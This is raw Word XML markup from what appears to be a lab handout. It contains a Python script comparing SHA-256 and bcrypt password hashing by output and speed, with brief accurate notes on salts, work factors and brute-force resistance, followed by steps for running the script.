      </w:r>
    </w:p>
    <w:p w14:paraId="04E53011" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6771BC9D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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(hashing_comparison.py):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DB4F8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="44"/>
        <w:ind w:left="360" w:right="8395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hashlib import bcrypt import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F45114" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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SHA-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D754F2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E271E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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hash_sha256(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56376D6D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="840" w:right="5398"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sha256 = hashlib.sha256() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sha256.update(data.encode('utf-8')) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>return sha256.hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276DD148" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="360" w:right="6114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bcrypt def hash_bcrypt(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B027319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salt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bcrypt.gensalt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68066BE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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bcrypt.hashpw(data.encode('utf-8'),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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>salt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59669DB6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="224"/>
        <w:ind w:left="360" w:right="18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compare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performance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bcrypt def compare_hashing_algorithms():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD47AD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"supersecretpassword"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08739BA8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56272D68" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="6526"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># SHA-256 hashing start_time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time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805E385" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="5038"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sha256_hash = hash_sha256(data) sha256_time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time.time()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start_time print(f"SHA-256 Hash: {sha256_hash}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F63F01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print(f"SHA-256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Time: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{sha256_time:.6f}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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DBF377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6217D77F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="6526"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># bcrypt hashing start_time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time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B316FA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4861"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bcrypt_hash = hash_bcrypt(data) bcrypt_time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time.time()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start_time print(f"bcrypt Hash: {bcrypt_hash}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85479E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print(f"bcrypt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Time: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{bcrypt_time:.6f}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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60194739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44CE32D8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Comparing performance print("\nPerformance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Comparison:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358159D8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="36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print(f"SHA-256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faster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than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{bcrypt_time/sha256_time:.2f} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>times.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6070FC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DB5242" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Security Considerations print("\nSecurity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Considerations:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEF783B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360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print("1.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fast,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making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vulnerable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brute-force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attacks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 rainbow table attacks.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4497F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360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print("2.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designed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slow,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increasing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brute-force attacks and making it more secure.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E473B6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="36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print("3.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also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uses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salt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protect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against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rainbow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 xml:space="preserve">table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>attacks.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38380082" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="783" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("4.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hashes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cannot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reversed,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includes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work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factor (cost factor) to make hashing more expensive.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57784A93" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD1D0F4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="5631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comparison if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="80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80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":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5849FB87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compare_hashing_algorithms()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2943508C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="194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1675D0EC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DC9AD7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="1"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hashing_comparison.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2D1148" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="844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5DFCD590" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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4799F06B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A9236B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hashing_comparison.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC0A4F3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4D977" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="74"/>
        <w:ind w:left="1079" w:hanging="359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will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1697863F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:before="5"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Hash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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>supersecretpassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>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both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"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bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05D476" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing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Display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resulting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hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B487D6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:line="268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Show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computation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times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both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algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CBF5D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:line="268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Provide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comparison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security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A2C519" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167005F5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Verifying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Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1527B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E627A7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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hashing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algorithm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likely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much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faster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bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C0BE1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="269" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pP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take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longer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compute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due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deliberate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slowness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B0AB40" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="563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security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higher,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especially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against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brute-force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attacks,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work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factor and use of a salt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA6A166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1081D86" wp14:editId="6F617352">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="20955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1704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888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1766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E2689" id="Group 115" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.45pt;width:486.1pt;height:1.65pt;z-index:-15719424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&#10;">
                <v:shape id="Graphic 116" o:spid="_x0000_s1027" style="position:absolute;width:61722;height:203;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6172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BKwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN50oy0iqauIIvSq9qC3SXaapM3OxuzUxH/vFoTe5vE+Z7nuXa1u1IbKs4HpJAFFnHtb&#10;cWHg87QfL0AFQbZYeyYDdwqwXg0HS0yt7/hAt6MUKoZwSNFAKdKkWoe8JIdh4hviyH351qFE2Bba&#10;ttjFcFfrWZLMtcOKY0OJDW1Lyn+Ov85A9nYWlu/+cth19e5a7LPr6ywz5mXUb95BCfXyL366P2yc&#10;P53D3zPxAr16AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIYEMErBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m6172200,l,,,20320r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 117" o:spid="_x0000_s1028" style="position:absolute;left:6170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BB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bM3+H0mXSDXPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDCcWBBwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 118" o:spid="_x0000_s1029" style="position:absolute;left:3;top:8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B10xgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BSwMx&#10;EIXvgv8hjODNZqtQ223T0gqCHqrYloXehs24WdxMliS223/fOQjeZnhv3vtmsRp8p04UUxvYwHhU&#10;gCKug225MXDYvz5MQaWMbLELTAYulGC1vL1ZYGnDmb/otMuNkhBOJRpwOfel1ql25DGNQk8s2neI&#10;HrOssdE24lnCfacfi2KiPbYsDQ57enFU/+x+vYEqRrf+/Nhu6P2pP7bPRTXbpMqY+7thPQeVacj/&#10;5r/rNyv4Y6GVZ2QCvbwCAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEABZwddMYAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m3048,3048l,3048,,16764r3048,l3048,3048xem6173152,r-3035,l6170117,3048r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 119" o:spid="_x0000_s1030" style="position:absolute;left:61704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QtEwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X+h+WEbyUutFD0ZhVpFLoIQQ00vOQHbPB7GzYXTX9992C4G0e73OK7Wh7cSMfOscK5rMMBHHj&#10;dMetglP99b4EESKyxt4xKfilANvN60uBuXZ3PtDtGFuRQjjkqMDEOORShsaQxTBzA3Hizs5bjAn6&#10;VmqP9xRue7nIsg9psePUYHCgT0PN5Xi1Ct64KivT1Re7r3/qzJeh6mWp1HQy7tYgIo3xKX64v3Wa&#10;P1/B/zPpArn5AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAO5FC0TBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m3047,l,,,13716r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 120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uIwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvBf/DMkJvdaNgKdFVVBBKPTX14m3Mjkk0Oxt2V5P+e+dQ6G2G9+a9b5brwbXqQSE2ng1MJxko&#10;4tLbhisDx5/92weomJAttp7JwC9FWK9GL0vMre/5mx5FqpSEcMzRQJ1Sl2sdy5ocxonviEW7+OAw&#10;yRoqbQP2Eu5aPcuyd+2wYWmosaNdTeWtuDsD5Esssv7rcPbX/e10LeZha+fGvI6HzQJUoiH9m/+u&#10;P63gzwRfnpEJ9OoJAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAbn07iMMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
